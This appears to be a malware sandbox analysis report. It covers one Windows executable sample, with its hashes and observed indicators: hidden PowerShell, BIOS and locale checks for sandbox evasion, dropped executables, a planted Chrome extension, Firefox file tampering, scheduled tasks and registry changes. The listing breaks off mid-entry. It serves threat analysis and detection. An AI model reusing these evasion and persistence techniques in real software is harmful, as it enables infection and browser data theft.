Overview
overview
10Static
static
7233f95c87f...31.exe
windows7-x64
7233f95c87f...31.exe
windows10-2004-x64
72d8ea1230d...aa.exe
windows7-x64
102d8ea1230d...aa.exe
windows10-2004-x64
1034dba85bb2...1a.exe
windows10-2004-x64
7463d0b0903...ea.exe
windows7-x64
1463d0b0903...ea.exe
windows10-2004-x64
14bcf45bde8...39.exe
windows7-x64
104bcf45bde8...39.exe
windows10-2004-x64
105292b8004f...ce.exe
windows7-x64
105292b8004f...ce.exe
windows10-2004-x64
106babc5b52d...53.dll
windows7-x64
36babc5b52d...53.dll
windows10-2004-x64
385b73b7b3c...45.exe
windows7-x64
1085b73b7b3c...45.exe
windows10-2004-x64
108eb41b097a...ff.exe
windows7-x64
108eb41b097a...ff.exe
windows10-2004-x64
8932380926b...ef.exe
windows7-x64
7932380926b...ef.exe
windows10-2004-x64
79d8729b9ca...de.exe
windows7-x64
109d8729b9ca...de.exe
windows10-2004-x64
89e147a3bb2...53.dll
windows7-x64
89e147a3bb2...53.dll
windows10-2004-x64
8bccfdc8e1a...96.exe
windows7-x64
7bccfdc8e1a...96.exe
windows10-2004-x64
7bf5a9bb619...d7.exe
windows7-x64
3bf5a9bb619...d7.exe
windows10-2004-x64
3d0017384df...0a.exe
windows7-x64
3d0017384df...0a.exe
windows10-2004-x64
3d72aa8fe30...89.exe
windows7-x64
3d72aa8fe30...89.exe
windows10-2004-x64
7fa622e0a4d...52.exe
windows7-x64
1Resubmissions
15-11-2024 18:05
241115-wpjcdsxrdy 1011-11-2024 21:40
241111-1h6xbsxcql 1003-12-2022 17:54
221203-wg4ncscc33 10Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 21:40
Behavioral task
behavioral1
Sample
233f95c87f4930fc7608e264cf8be9d4ff0d5f073c411dc986c7aa8ac2055231.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
233f95c87f4930fc7608e264cf8be9d4ff0d5f073c411dc986c7aa8ac2055231.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
2d8ea1230d6d994febd35edec21f298efe7e1a2a6f75d00a691035980f30a5aa.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
2d8ea1230d6d994febd35edec21f298efe7e1a2a6f75d00a691035980f30a5aa.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
34dba85bb25c6589d0a5befe607e52b82a740402b92dbb5989797a523fb7561a.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
463d0b090396ffa05d579521256e421080a955415554feebe490482551eb08ea.exe
Resource
win7-20240903-en
Behavioral task
behavioral7
Sample
463d0b090396ffa05d579521256e421080a955415554feebe490482551eb08ea.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
4bcf45bde8ef34c0afeea288098cf34da11c2748eead6cf4752db1a4a2e79c39.exe
Resource
win7-20241010-en
Behavioral task
behavioral9
Sample
4bcf45bde8ef34c0afeea288098cf34da11c2748eead6cf4752db1a4a2e79c39.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral10
Sample
5292b8004f9078cfddbb45f7a0a1d0e6c84a958e43e602f43f8af4161983b6ce.exe
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
5292b8004f9078cfddbb45f7a0a1d0e6c84a958e43e602f43f8af4161983b6ce.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
6babc5b52d59c0b41e526f06b9e751aeef7ad6fc8b9eef5f56f95d4e3cded853.dll
Resource
win7-20240903-en
Behavioral task
behavioral13
Sample
6babc5b52d59c0b41e526f06b9e751aeef7ad6fc8b9eef5f56f95d4e3cded853.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
85b73b7b3c9acc6648beb77ce878ebeea26a2a949bf17c3184f2bd4544d12b45.exe
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
85b73b7b3c9acc6648beb77ce878ebeea26a2a949bf17c3184f2bd4544d12b45.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral16
Sample
8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
Resource
win7-20240903-en
Behavioral task
behavioral17
Sample
8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral18
Sample
932380926bc6bffcdf0bc446af37d140ce22426f651679e3b7d1c8fea83d14ef.exe
Resource
win7-20241010-en
Behavioral task
behavioral19
Sample
932380926bc6bffcdf0bc446af37d140ce22426f651679e3b7d1c8fea83d14ef.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral20
Sample
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
Resource
win7-20241010-en
Behavioral task
behavioral21
Sample
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral22
Sample
9e147a3bb22a10fe3f032dda125b871c7892065a68acd85de372e4622ec2a753.dll
Resource
win7-20240903-en
Behavioral task
behavioral23
Sample
9e147a3bb22a10fe3f032dda125b871c7892065a68acd85de372e4622ec2a753.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
bccfdc8e1ac04a684732b0011d6b512118d3b6fb5a249803cd2e87427a965296.exe
Resource
win7-20240903-en
Behavioral task
behavioral25
Sample
bccfdc8e1ac04a684732b0011d6b512118d3b6fb5a249803cd2e87427a965296.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral26
Sample
bf5a9bb619ac4bdad9a043f41b3980bf442f3965564ce612ced3cb2352311fd7.exe
Resource
win7-20240903-en
Behavioral task
behavioral27
Sample
bf5a9bb619ac4bdad9a043f41b3980bf442f3965564ce612ced3cb2352311fd7.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral28
Sample
d0017384df7b41aba785a35c92082d1460af89204cfae22e6173eaebe16b270a.exe
Resource
win7-20241023-en
Behavioral task
behavioral29
Sample
d0017384df7b41aba785a35c92082d1460af89204cfae22e6173eaebe16b270a.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral30
Sample
d72aa8fe30b132afe13a9be90142550b530d9687aff41954bbd3503115f37489.exe
Resource
win7-20241010-en
Behavioral task
behavioral31
Sample
d72aa8fe30b132afe13a9be90142550b530d9687aff41954bbd3503115f37489.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral32
Sample
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52.exe
Resource
win7-20240903-en
General
-
Target
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
-
Size
6.3MB
-
MD5
ded964e022a37d93d434091ec75f9881
-
SHA1
e89a551ac1f19dc3838e21157667e2f98d84d06b
-
SHA256
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde
-
SHA512
13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af
-
SSDEEP
196608:91OEVXHF+E/eq7QuIUVUMxVuAK1X84eu/k9RD13q:3OEVV+tq7Q7U62AAi84VkF13q
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 73 2400 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 964 powershell.EXE 3120 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation gKfVXar.exe -
Executes dropped EXE 3 IoCs
pid Process 1160 Install.exe 3980 mUNDKqg.exe 2596 gKfVXar.exe -
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 5092 forfiles.exe 2280 forfiles.exe -
Loads dropped DLL 1 IoCs
pid Process 2400 rundll32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json gKfVXar.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini gKfVXar.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 gKfVXar.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini mUNDKqg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 gKfVXar.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol mUNDKqg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 gKfVXar.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA gKfVXar.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 gKfVXar.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\ZUXSmeDRU\wwmBpS.dll gKfVXar.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja gKfVXar.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi gKfVXar.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak gKfVXar.exe File created C:\Program Files (x86)\ZUXSmeDRU\EiJiwro.xml gKfVXar.exe File created C:\Program Files (x86)\xonCRuklPFipnPeqKpR\horCPWo.dll gKfVXar.exe File created C:\Program Files (x86)\xonCRuklPFipnPeqKpR\lYMkSqB.xml gKfVXar.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi gKfVXar.exe File created C:\Program Files (x86)\UBqYudvSNocU2\cMEXQfR.xml gKfVXar.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak gKfVXar.exe File created C:\Program Files (x86)\UBqYudvSNocU2\lwIwlmwBdpeSn.dll gKfVXar.exe File created C:\Program Files (x86)\oXjeNNLqKAotC\MkDyriz.dll gKfVXar.exe File created C:\Program Files (x86)\oXjeNNLqKAotC\nAJnCyw.xml gKfVXar.exe File created C:\Program Files (x86)\RqtPwFqMTiUn\aArAQoZ.dll gKfVXar.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\MFUxwpyluZmBswWip.job schtasks.exe File created C:\Windows\Tasks\SEVCueFJyRflUhU.job schtasks.exe File created C:\Windows\Tasks\NGWtXtGwgKKYsphzV.job schtasks.exe File created C:\Windows\Tasks\bKwcWZekAnYWEgmozo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gKfVXar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mUNDKqg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" gKfVXar.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ gKfVXar.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing gKfVXar.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" gKfVXar.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix gKfVXar.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f0eec59f-0000-0000-0000-d01200000000} gKfVXar.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" gKfVXar.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" gKfVXar.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer gKfVXar.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f0eec59f-0000-0000-0000-d01200000000}\MaxCapacity = "14116" gKfVXar.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created 